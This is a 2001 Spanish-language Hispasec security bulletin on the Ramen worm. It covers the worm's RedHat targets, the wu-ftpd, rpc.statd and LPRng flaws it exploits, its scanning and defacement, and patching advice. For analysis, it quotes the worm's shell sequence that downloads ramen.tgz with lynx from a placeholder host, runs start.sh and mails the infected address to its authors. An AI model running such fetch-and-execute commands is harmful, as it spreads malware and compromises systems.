> --------------------------------------------------------------------
>  Hispasec - una-al-d�a                                   21/01/2001
>  Todos los d�as una noticia de seguridad           www.hispasec.com
> --------------------------------------------------------------------
>
> Un gusano muy activo afecta a sistemas Linux de todo el mundo
> -------------------------------------------------------------
> En los �ltimos d�as ha surgido en la red un gusano que ya se encuentra
> in the wild. Ramen, nombre que recibe este nuevo pat�geno, afecta a
> sistemas RedHat 6.2 y RedHat 7.0 aprovech�ndose de vulnerabilidades
> conocidas desde hace tiempo y con parches para ellas en los servicios
> rpc, wuftp o LPRng.
>
> Este nuevo gusano ha pillado desprevenida a toda la comunidad Linux,
> que no esperaba nada semejante y siempre ha permanecido convencida de
> la seguridad de sus sistemas frente a virus y gusanos que tanto
> afectan en la actualidad a los sistemas Windows. Pero en esta ocasi�n,
> una elaborada y efectiva colecci�n de herramientas destinadas a
> explotar vulnerabilidades ha conseguido poner en jaque a los sistemas
> Linux de todo el mundo.
>
> Es falso que no existen virus o gusanos para Linux o Unix, pero en la
> actualidad la propia arquitectura de Windows se presenta como una
> plataforma m�s vulnerable ante el ataque de virus en comparaci�n con
> la robustez que pueden alcanzar los sistemas Unix convenientemente
> administrados. Sin embargo, Ramen representa un serio toque de
> atenci�n tanto a la comunidad Unix como a las propias casas antivirus,
> que a partir de ahora deber�n prestar mayor atenci�n a posibles brotes
> de este tipo de espec�menes.
>
> Ramen afecta a sistemas RedHat Redhat 6.2 a trav�s de un servicio rpc
> explotable o de un wuftpd vulnerable, para los sistemas RedHat 7.0 el
> gusano infecta haciendo uso de una vulnerabilidad en LPRng. A su paso,
> el gusano deja un rastro de p�ginas web modificadas en los servidores
> atacados, con un gr�fico en el que se hace alusi�n a los tallarines
> orientales de marca Ramen.  En la p�gina modificada el gusano tambi�n
> deja la frase "Hackers looooooooooooove noodles," y aparece firmado
> como "RameN Crew". Ya han aparecido hasta servidores de la NASA con
> esta huella que da signos evidentes del paso del gusano por el
> sistema.
>
> Ramen realiza un escaneo de clases B mediante una exploraci�n SYN
> consistente en una versi�n modificada de synscan. Esta exploraci�n
> puede llevar entre 15 y 25 minutos y pretende localizar sistemas
> Redhat 6.2 o 7.0. Durante el rastreo Ramen comprueba el anuncio del
> tipo de servidor de FTP, s�lo comprueba el puerto 21 para esto, si
> aparece la cadena "Mon Feb 28" grabar� la IP y/o el nombre de host en
> el archivo ".w". En cambio, si encuentra la cadena "Wed Aug 9",
> grabar� los datos en el archivo ".l". De esta forma realiza una
> clasificaci�n de la versi�n de sistema operativo, RedHat 6.2 en el
> primer caso y 7.0 en el segundo.
>
> Tras esto se lanzar�n dos scripts diferentes dependiendo de cada
> sistema contra las direcciones de dichos archivos. Contra las m�quinas
> RedHat 6.2 emplear� la lista del archivo ".w" ejecutar� primero un
> exploit contra el wu-ftpd, tras este ataque se ejecutar� un exploit
> contra rpc.statd en la m�quina objetivo. En caso de lograr su objetivo
> ejecutar� la siguiente secuencia de comandos:
>
> mkdir /usr/src/.poop;cd /usr/src/.poop
> export TERM=vt100
> lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
> cp ramen.tgz /tmp
> gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh
> echo Eat Your Ramen! : mail -s TOADDR -c [EMAIL PROTECTED]
> [EMAIL PROTECTED]
>
> Destinada a enviar un mensaje con las direcciones de la m�quina desde
> la que se lanza el ataque y la nueva m�quina infectada. El mail se
> env�a a las direcciones [EMAIL PROTECTED] y [EMAIL PROTECTED]
>
> Para atacar a los sistemas con RedHat 7 Ramen emplea un ataque contra
> LPRng. Este programa es una implementaci�n de una utilidad de spool de
> impresora.
>
> Una vez en el sistema el gusano establece un peque�o servidor HTTP/0.9
> en el puerto 27374 que se emplea para servir copias de si mismo al
> exterior (esto se realiza a trav�s de inetd en RedHat 6.2 y xinetd en
> RedHat 7.0).  para reproducirse a si mismo, determina la direcci�n IP
> y elima los servicios vulnerable que le han servido para introducirse
> en el sistema. Es decir, en RedHat 6.2 eliminar� rpc.statd y en
> RedHat 7.0 lpd.  De forma adicional a�adir� los usuarios "ftp" y
> "anonymous" al archivo /etc/ftpusers para cerrar el agujero en
> wu-ftpd. Para finalizar modificar� todos los archivos index.html por
> la p�gina anteriormente descrita.
>
> Para evitar la infecci�n por este gusano es conveniente actualizar los
> sistemas RedHat. Todas los parches necesarios para cubrir las
> vulnerabilidades descritas se encuentran disponibles en el sitio web
> de RedHat. Hay que aclarar, como ya hemos comentado, que los parches
> no son espec�ficos para este gusano, sino que cierran vulnerabilidades
> detectadas y solucionadas hace tiempo.
>
> Desde Hispasec una vez m�s recordamos y recomendamos la necesidad de
> mantener los sistemas actualizados, labor que deben realizar tanto los
> administradores de sistemas en las empresas como los usuarios en sus
> equipos dom�sticos.
>
> Opina sobre esta noticia:
> http://www.hispasec.com/unaaldiacom.asp?id=819
>
> M�s informaci�n:
>
> Descripci�n de Ramen
> http://members.home.net/dtmartin24/ramen_worm.txt
>
> Vulnerabilidad en wu-ftp (Securityfocus)
> http://www.securityfocus.com/vdb/bottom.html?vid=1387
>
> Vulnerabilidad en rpc.statd (Securityfocus)
> http://www.securityfocus.com/vdb/bottom.html?vid=1480
>
> Vulnerabilidad en LPRng (Securityfocus)
> http://www.securityfocus.com/vdb/bottom.html?vid=1712
>
> Ramen afecta a la NASA (Securityfocus)
> http://www.securityfocus.com/templates/article.html?id=141
>
> Silicon.com
>
http://www.silicon.com/public/door?REQUNIQ=979925654&6004REQEVENT=&REQINT1=4
2151&REQSTR1=newsnow
>
> Linux Today
> http://linuxtoday.com/news_story.php3?ltsn=2001-01-18-006-06-SC
>
> Computerworld
>
http://www.computerworld.com/cwi/stories/0,1199,NAV47-68-84-88_STO56475,00.h
tml
>
> CMPTR
> http://www.cmptr.com/view.php?id=502
>
>
> Antonio Ropero
> [EMAIL PROTECTED]
>
>
> --------------------------------------------------------------------
>  (c) Hispasec, 2001                  www.hispasec.com/copyright.asp
> --------------------------------------------------------------------
>




Responder a